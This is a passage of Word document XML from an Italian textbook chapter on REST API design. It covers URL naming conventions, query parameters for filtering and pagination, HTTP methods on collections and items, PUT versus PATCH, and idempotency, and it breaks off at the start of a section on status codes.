      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non vanno nell’URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’azione è già indicata dal metodo HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si usa il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">plurale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per le collezioni:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Coerente in tutta l’API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si usa il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">kebab-case</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o lo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">snake_case</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se l’URL è composto da più parole, mai gli spazi né le maiuscole:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dati-clienti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dati_clienti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/DatiClienti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/Dati Clienti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non include l’estensione del file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✓,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti/42.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✗.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="156"/>
    <w:bookmarkStart w:id="157" w:name="filtri-ordinamento-paginazione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Filtri, ordinamento, paginazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando una collezione contiene molti elementi, di solito non li si restituisce tutti in una volta. Si usano parametri di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">query string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per filtrare, ordinare, paginare:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /messaggi?autore=mario&amp;ordina=data&amp;pagina=2&amp;dimensione=20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Significato:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dammi i messaggi di Mario, ordinati per data, pagina 2 da 20 elementi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Convenzioni comuni:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?pagina=2&amp;dimensione=20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per paginare (in inglese si vedono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?page=2&amp;size=20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?offset=20&amp;limit=20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?ordina=data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?sort=date</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per ordinare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?stato=attivo&amp;categoria=tecnica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per filtrare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Non c’è uno standard rigido: ogni progetto sceglie la propria convenzione e la rispetta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="157"/>
    <w:bookmarkEnd w:id="158"/>
    <w:bookmarkStart w:id="160" w:name="X4441106f59935bbd3bfd3e13c47566b0ddc322b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.7 I metodi HTTP rivisti per le API REST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> abbiamo visto i metodi HTTP. Adesso li rivediamo dal punto di vista delle API REST, dove ognuno ha un significato preciso e codificato.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Metodo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Su collezione (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/utenti</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Su elemento (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/utenti/42</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restituisce la lista di tutti gli utenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restituisce l’utente 42</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Crea</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">un nuovo utente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(raramente usato qui)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(raramente usato qui)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sostituisce</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">completamente l’utente 42</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(raramente usato qui)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Modifica parzialmente</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">l’utente 42</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(raramente usato qui)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Cancella</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">l’utente 42</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PUT vs PATCH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una distinzione che spesso confonde:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"username": "mario", "email": "..."}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">significa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sostituisci l’utente 42 con questo nuovo oggetto al completo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. I campi non specificati vengono cancellati o impostati al loro default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PATCH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"email": "nuovo@esempio.it"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">significa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">modifica solo i campi specificati, lascia stare il resto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nella pratica, molte API usano solo PUT per fare anche le modifiche parziali (rilassando la semantica originale). Niente di drammatico.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="159" w:name="idempotenza-rivista"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Idempotenza, rivista</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riprendendo il concetto del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 3</w:t>
        </w:r>
      </w:hyperlink>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Metodo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Idempotente?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sicuro (non modifica)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌ No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌ No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌ No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌ Generalmente no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌ No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌ No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Idempotente = chiamarlo 2, 5, 100 volte produce lo stesso risultato finale di una chiamata sola. Sicuro = non modifica niente sul server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perché interessano queste proprietà? Perché in caso di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">errore di rete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, un client può</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ripetere automaticamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una richiesta idempotente senza fare danni. Ma non può ripetere una POST senza rischiare di creare due risorse (paghi due volte, registri due account).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="159"/>
    <w:bookmarkEnd w:id="160"/>
    <w:bookmarkStart w:id="164" w:name="b.8-codici-di-stato-http-per-le-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.8 Codici di stato HTTP per le API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I codici di stato del </w:t>
      </w:r>
